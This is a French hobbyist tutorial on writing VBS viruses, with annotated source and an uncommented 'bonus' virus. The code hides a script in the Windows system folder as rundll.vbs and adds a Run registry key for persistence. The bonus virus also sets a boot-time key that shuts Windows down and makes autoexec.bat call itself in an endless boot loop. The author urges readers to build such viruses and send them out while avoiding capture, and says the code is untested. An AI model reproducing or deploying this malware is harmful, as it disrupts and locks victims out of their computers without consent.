VIRUS VBS

I LOVE YOU : j'en ai entendu bcp parler au info mais à part ca je n'ai entendu aucun copain dire : "put1 j'ai recu I LOVE YOU ", je sais même pas si il a ete vraiment ete fait en VBS, si il a ete crypter ou pas, etc .....

Bref, I LOVE YOU est un virus archi médiatique qui a enrichi la presse et les vendeurs d'anti virus !!

Moi ce que je fait c'est que je cré des virus, et je les envoie rarement, juste pour les grandes occasion, et franchement je ne souhaite pas que mon virus soit connu du monde entier car deja les risque de me faire prendre augmente et de 2 j'ai pas envie de me faire pecho .....

N'oubliez pas, un virus, un bon virus, un vrai de vrai, ne détruit pas !!! NE DETRUIT PAS, il y a que les virus qui veulent faire du bruit qui veulent etre connu qui détruise. Un bon virus géne l'utilisateur grace a l'ingeniosite de son programmeur mais ca c'est mon ideologie, vous , vous faites comme vous voulez, si vous voulez etre connu puis derrière les barreau , c'est votre choix !!! ;p

Donc apres ceci, Commencons cet article pour le fun, pour s'éclater etc.... C'est parti !!

ps : on m'a envoyé bcp de mail comme quoi mes articles VBS sont pas assez explicite alors ne vous étonnez pas si je dit des trucs ici qui ont déja été dit dans mes autres articles mais pas assez expliqué. Voila !

CONSTRUCTION DE VIRUS PAS A PAS

1er Etape :

Tout d'abord, il faut que le virus s'installe sur le disque dur, et, eventuellement se cache sur le DD.

2eme Etape :

Ensuite, le virus se multiplie ou alors il modifie les fichiers de démarrage ou la base des registres pour qu'il soit démarré au prochain démarrage de zindoz .

3eme Etape :

Apres s'etre bien installé, le virus peut commencer à opérer , placez donc dans votre code les routines qui dérangeront l'utilisateur sans lui détruire des données .

4eme Etape(dépend des virus) :

Si le virus est dérangé(une de ses parties est supprimé), alors il se remultiplie autre part.

Voila, un petit shema rapide de virus classiques(si vous n'etes pas d' accord, faites le moi savoir : bigood@lycosmail.com )

A partir de ce shéma théorique, créons un virus véritable pas à pas . (j'ai mit les commentaires en jaune et les sources en rouge.)

• Première étape :

Ici, il faut que le virus se place sur le disque dur. Donc écrivons la routine :

Set FileObj = CreateObject("Scripting.FileSystemObject") //on cré l'objet Scripting.FileSystemObject qui permet de lire écrire etc .. dans les fichiers et on l'attribu à FileObj
file = "c:\windows\system\rundll.vbs " //on assigne la valeur c:\.... à la variable file
Set OutStream= FileObj.CreateTextFile (file, True, False) // ici on cré le fichier qui est stipulé dans la variable file : rundll.vbs

Voila cette routine cré un fichier nommé rundll.vbs dans c:\windows\system donc il est caché(en qq sorte).

• Deuxième étape :

Bon alors là on va faire une routine tranquille qui modifie la Base de Registre pour démarrer rundll.vbs au prochain démarrage

Set WshShell = CreateObject("WScript.Shell") // on cré l'objet WScript.Shell et on le stocke dans WshShell

WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RUNDLL", "C:\WINDOWS\system\RUNDLL.vbs" //ici on cré la clé hkey....\ avec la valeur c:\.....

Voila donc la on modifie la Base de Registre et on cré la clef HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RUNDLL avec la valeur C:\WINDOWS\system\RUNDLL.vbs comme ça le virus démarre au prochain démarrage. VoIlA .

• Troisième étape :

Donc ici, on fout ce qui va déranger l'utilisateur donc nous, on va simplement modifier l'autoexec.bat pour afficher un message au démarrage. Ce n'est pas trop méchant, mais c'est marrant.

Set OutStream= FileObj.CreateTextFile (file, True, False) //On cré l'objet Outstream qui permet de créer et/ou de modifier un fichier
OutStream.WriteLine "msgbox "Hello, tu es infecté par un petit virus merdique ;p"" //Ici on écrit une ligne de code dans le fichier rundll.vbs (la variable file) qui affiche un message dans une boite de dialogue

Voila, donc vous voyez, ce n'est pas vraiment méchant comme routine, mais cet exemple de virus est un exemple simple archisimple.

MAIS, CE VIRUS Y FAIT QUOI ??

Récapitulons, tout d'abord le code source en entier :

Set FileObj = CreateObject("Scripting.FileSystemObject") //on cré l'objet Scripting.FileSystemObject qui permet de lire écrire etc .. dans les fichiers et on l'attribu à FileObj
file = "c:\windows\system\rundll.vbs " //on assigne la valeur c:\.... à la variable file
Set OutStream= FileObj.CreateTextFile (file, True, False) // ici on cré le fichier qui est stipulé dans la variable file : rundll.vbs

Set WshShell = CreateObject("WScript.Shell") // on cré l'objet WScript.Shell et on le stocke dans WshShell

WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RUNDLL", "C:\WINDOWS\system\RUNDLL.vbs" //ici on cré la clé hkey....\ avec la valeur c:\.....

Set OutStream= FileObj.CreateTextFile (file, True, False) //On cré l'objet Outstream qui permet de créer et/ou de modifier un fichier
OutStream.WriteLine "msgbox "Hello, tu es infecté par un petit virus merdique ;p"" //Ici on écrit une ligne de code dans le fichier rundll.vbs (la variable file) qui affiche un message dans une boite de dialogue

Je n'ai pas vérifié si ce virus marche, car en fait je pense qu'il ne vaut mieux pas créer deux fois l'objet WshShell mais bref, si vous avez commpris comment marche ce virus, vous pouvez le déboguer.

Voila c'est fini, pour bonus, un virus VBS pas commente que vous avez qu'a dechifre et si vous ne le comprenez pas mattez les anciens n° car toutes les fonctions que je met dans ce virus sont explique dans mes tutorio .

----------------------------------------------------------------------------------------------------------

msgbox"Une erreur est survenue lors du chargement de XXX, Windobe est sur le point de craquer !!
Ceci est dû au fait que vous me surmenez, vous devriez m'offrir des vacances
plutôt que de me faire bosser !!!! ",vbcritical
msgbox"Des vacances au bord de la mer ",vbinformation
msgbox"ET PLUS VITE QUE CA !!!" ,vbexclamation
msgbox"Kapish ! ",vbcritical
msgbox"Sinon BoOoOoOoOoOm ........ " ,vbcritical
reponse = inputbox("Etes-vous d'accord ??? (O : pour oui , N pour non) ")
if reponse ="O" then
msgbox"Heureusement pour vous !! ;) " ,vbinformation
else
msgbox"Comment !!!!",vbexclamation
msgbox"Formatage imminent ...",vbcritical
msgbox"3"
msgbox"2"
msgbox"1"
msgbox"Oh et puis non je ne vait pas me blesser, je vais plutot refuser de redemarrer !!"
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RUNDLL32", "C:\WINDOWS\RUNDLL32.EXE %windir%\system\user.exe,Exitwindows"
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set OutStream= FileObj.CreateTextFile (file, True, False)
outstream.write(tline)
OutStream.WriteBlankLines(5)
OutStream.WriteLine "autoexec.bat"
end if

----------------------------------------------------------------------------------------------------------

Voila, ce virus est bien marrant non ??Je vous dit qd même en gros ce qu'il fait : il cré une cle dont la valeur est execute a chaque demarrage et qui eteint l'ordi mais ceci ne devrait jamais arrive vu que on rajoute apres un autoexec.bat dans l'autoexec bat ;p ce qui fait que l'autoexec se relance tout le temps ....

Voila bon programmage .

BigOOd@lycosmail.com

BigOOd